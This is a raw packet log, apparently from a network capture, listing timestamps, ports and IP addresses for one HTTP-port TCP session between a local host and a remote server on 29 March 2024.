Mar 29, 2024 14:25:32.382401943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.382415056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.382447004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.382462978 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.382612944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.382643938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.382654905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.382682085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.569036961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.569116116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.569127083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.569170952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.585737944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.585803986 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.585828066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.585869074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.585954905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.586000919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.586038113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.586072922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.586488962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.586544037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.586601973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.586641073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.586694002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.586726904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.586740017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.586779118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.779865980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.779966116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.797086000 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.797100067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.797173977 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.797358036 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.797399044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.797405958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.797442913 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.797781944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.797796011 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.797823906 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.797836065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.798141003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.798181057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.798191071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.798204899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:32.798227072 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.798238039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:32.999958992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.000003099 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.000041962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.000066996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.016252041 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.016303062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.016324997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.016350985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.016479015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.016494036 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.016521931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.016544104 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.016678095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.016690969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.016716957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.016733885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.017091036 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.017103910 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.017131090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.017152071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.017294884 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.017340899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.230371952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.230386972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.230448008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.246423960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.246488094 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.246700048 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.246714115 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.246747017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.246777058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.246943951 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.246957064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.246990919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.247003078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.247433901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.247447014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.247458935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.247473955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.247478962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.247503996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.247534037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.453399897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.453468084 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.453489065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.453577995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.467000008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.467036009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.467067957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.467094898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.467394114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.467407942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.467443943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.467462063 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.467947960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.467988968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.468018055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.468043089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.468049049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.468079090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.468103886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.468132019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.468141079 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.468144894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.468161106 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.468177080 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.673224926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.673374891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.687539101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.687625885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.687654018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.687669039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.687707901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.687732935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.687758923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.687805891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.688330889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.688405991 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.688435078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.688479900 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.688574076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.688636065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.688651085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.688714027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.688893080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.688967943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.892035007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.892059088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.892080069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.892213106 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.892332077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.892457008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.906771898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.906862020 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.906949043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.906980991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.907011986 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.907094955 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.907388926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.907426119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.907470942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.907545090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.907994986 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.908013105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.908075094 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.908308029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.908348083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:33.908375025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:33.908463001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.110759974 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.110794067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.110843897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.110867023 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.125143051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.125222921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.125272036 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.125319004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.125340939 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.125392914 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.125405073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.125499964 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.125566959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.125638008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.125646114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.125716925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.125806093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.125866890 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.125886917 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.125947952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.126097918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.126161098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.126176119 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.126224995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.126251936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.126306057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.322182894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.322205067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.322351933 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.336225033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.336241961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.336322069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.336461067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.336499929 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.336545944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.336622000 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.336889029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.336915970 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.336965084 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.337042093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.337338924 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.337354898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.337415934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.337649107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.337670088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.337728024 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.338299990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.338319063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.338377953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.537678957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.537708044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.537903070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.551378012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.551428080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.551445961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.551462889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.551573038 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.551722050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.551780939 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.551780939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.551820040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.552392960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.552413940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.552433014 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.552452087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.552532911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.552594900 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.552994967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.553011894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.553029060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.553042889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.553060055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.553078890 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.768129110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.768275023 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.768342972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.768403053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.779514074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.779572010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.779678106 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.779695988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.779711962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.779758930 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.779834986 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.780823946 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.780880928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.780924082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.780966997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.781003952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.781028032 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.781032085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.781069040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.781116962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.781137943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.781140089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.781205893 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.781234980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.781322956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.976999998 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.977088928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.986987114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.987063885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.987283945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.987332106 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.988343954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.988363981 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.988396883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.988424063 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.989376068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.989397049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.989442110 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.989468098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.989499092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.989526033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.989550114 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.989561081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:34.989696980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:34.989742994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.192336082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.192431927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.200822115 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.200895071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.202071905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.202127934 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.202140093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.202174902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.202888012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.202948093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.203054905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.203102112 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.203284979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.203335047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.407531023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.407604933 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.417675018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.417746067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.420360088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.420458078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.435950041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.647106886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.690963030 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.691015959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.691037893 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.691077948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.691091061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.691131115 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.691263914 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.691318035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.691344023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.691387892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.691412926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.691457033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.691524029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.691571951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.908627987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.908782959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.908906937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.908931971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.908971071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.908988953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.909038067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.909080982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.909131050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.909181118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:35.909315109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:35.909383059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.139112949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.139200926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.139297962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.139635086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.139651060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.139664888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.139694929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.139735937 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.351219893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.351243973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.351351023 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.351454973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.351480961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.351505041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.351524115 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.351535082 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.351563931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.351598024 CET	80	49699	89.238.170.230	192.168.2.7
